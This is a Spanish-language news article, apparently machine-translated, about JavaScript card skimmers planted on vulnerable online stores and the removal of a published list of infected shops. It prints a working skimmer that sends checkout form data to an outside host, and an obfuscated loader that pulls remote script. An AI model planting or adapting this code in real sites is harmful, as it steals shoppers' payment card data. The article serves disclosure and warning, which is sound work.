El descremado en línea es una forma relativamente nueva de fraude con tarjetas de crédito. La esencia es clara por el nombre. Si un skimmer normal es una superposición en un lector de tarjetas de cajero automático que arroja una tira magnética, entonces un skimmer en línea es un marcador de software en un servidor de tienda en línea que intercepta pasivamente los datos de pago a medida que un usuario los ingresa en los campos de texto en un navegador. Hasta la fecha, los carders se han concentrado principalmente en los servidores de transacciones donde se usa el cifrado, pero en este caso la información se elimina incluso antes del cifrado. Luego, la información sobre las tarjetas de pago se vende en foros clandestinos: por lo general, un extraño puede hacer pagos con estas tarjetas.Especialistas en seguridad en Nightly Secure dicenque el descremado en línea está ganando rápidamente popularidad recientemente. Por primera vez, la propagación de dicho fraude se discutió en 2015 . A partir de noviembre de 2015, de la lista de 255,000 tiendas en línea, se encontraron 3,501 tiendas con marcadores JS en el servidor. Durante el año, su número aumentó en un 69%.Un marcador de JavaScript de muestra para interceptar datos de pago tiene este aspecto (en este caso, la información se envía a http://ownsafety.org/opp.php):<script>
function j(e) {
var t = "; " + document.cookie,
o = t.split("; " + e + "=");
return 2 == o.length ? o.pop().split(";").shift() : void 0
}
j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) {
e("button").on("click", function() {
var t = "",
o = "post",
n = window.location;
if (new RegExp("onepage|checkout").test(n)) {
for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) {
var a = c[i].name;
"" == a && (a = i), t += a + "=" + c[i].value + "&"
}
if (t) {
var l = new RegExp("[0-9]{13,16}"),
u = new XMLHttpRequest;
u.open(o, e("
<div />").html("http://ownsafety.org/opp.php").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear()
}
}
})
});
El año pasado, los investigadores compilaron una lista de direcciones comúnmente utilizadas para la recopilación de datos:1860 https:
390 http:
309 https:
100 https:
70 https:
28 https:
23 https:
22 https:
20 https:
17 https:
10 https:
9 http:
5 https:
1 /js/index.php
1 /js/am/extensions/sitemap_api.php
1 https:
1 https:
1 https:
1 http:
1 http:
En casi todos los casos, se utilizan versiones pequeñas del mismo código.Este marcador es bastante difícil de detectar en el servidor. El código se descarga del CMS y funciona en el navegador. El año pasado, trabajó en los tres mil quinientos sitios mencionados durante varios meses, en muchos, seis meses o más.Los expertos creen que una gran cantidad de servidores infectados indican un alto grado de automatización del ataque. No algunos niños guionistas están haciendo esto, sino buenos profesionales. Probablemente de Rusia.Para implementar marcadores, se utilizan vulnerabilidades en el software de las tiendas en línea. En primer lugar, es un software vulnerable de Magento Commerce. Es a través de él que es más fácil implementar el código CMS, aunque de hecho este código puede funcionar en cualquier tienda en línea que no necesariamente use Magento. Consulte la tienda en línea para detectar vulnerabilidades en el sitio MageReports.com .Aunque el problema se planteó hace un año, durante el año pasado no ha desaparecido. Peor aún, las tiendas en línea infectadas se han convertido una vez y media más. En marzo de 2016, el número de tiendas con skimmers aumentó de 3501 a 4476, y en septiembre de 2016 a 5925.Los chicos de Nightly Secure publicaron una lista de todas las tiendas infectadas para advertir a los clientes y notificar a los administradores de estas tiendas sobre la vulnerabilidad. De hecho, entre ellos se encontraban sitios bastante populares, incluidos los departamentos de fabricantes de automóviles (Audi ZA), organizaciones gubernamentales (NRSC, Malasia), sitios de músicos populares (Björk) y organizaciones sin fines de lucro (Science Museum, Washington Cathedral).Si hace un año en casi todas las tiendas se usaban pequeñas modificaciones del mismo skimmer en línea, ahora los investigadores ya han encontrado 9 variedades separadas del script que pertenecen a 3 familias diferentes ( código de muestra en Github ).Los atacantes se han vuelto más inteligentes y ahora usan la ofuscación de código multinivel, que no es tan fácil de analizar. Por ejemplo, un script puede enmascararse así:
Código de malware real:<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');
Los autores también mejoraron el mecanismo para interceptar los datos de la tarjeta de pago. Si antes el malware simplemente interceptaba páginas con una cadena checkouten la URL, ahora ya reconoce los complementos de pago populares Firecheckout, Onestepcheckout y Paypal.Los especialistas de Nightly Secure intentaron ponerse en contacto con varias tiendas (aproximadamente 30) e informarles sobre el skimmer instalado, pero no recibieron una respuesta de la mayoría de las tiendas, mientras que otros mostraron un sorprendente despreocupación. Uno dijo que este no es su problema, porque los pagos son procesados por una empresa externa. El segundo dijo que era solo un error de Javascript que no era una amenaza. El tercero dijo que no puede haber peligro, porque "la tienda funciona con HTTPS". El autor envió una lista de tiendas de skimmer a Google para incluir en la lista negra la Navegación segura de Chrome.Una lista de todas las tiendas de skimmer se publicó originalmente en Github . Y aquí comenzó la diversión. Pronto github sin previo avisoeliminó de su sitio la publicación de resultados de investigaciones de tiendas en línea .Aparentemente, Github censuró según el procedimiento estándar, después de haber recibido una solicitud de DMCA de una de las tiendas. Por supuesto, la tienda es desagradable cuando encuentran vulnerabilidad y se lo cuentan a todo el mundo.Ayer, el autor transfirió los resultados de un estudio de seguridad de la tienda en línea al alojamiento de Gitlab . Hoy, una página en esta dirección devuelve el error 404. Hace unas horas, el autor recibió un correo electrónico de Gitlab explicando los motivos de la eliminación. Según la administración, la publicación de una lista de tiendas vulnerables se considera un "caso atroz" que no se puede resolver. Por lo tanto, la lista ha sido eliminada (UPD: acceso restaurado, Se disculpó el director de Gitlab).Copia de la lista en el archivo webCopiar a PastebinTenga en cuenta que la lista de tiendas con skimmers en línea instalados enumera 44 dominios en la zona .RU.Con suerte, los administradores de estas tiendas instalarán rápidamente la versión de Magento con los últimos parches y compensarán las pérdidas a los clientes que tienen filtraciones de tarjetas de pago filtradas en el mercado negro.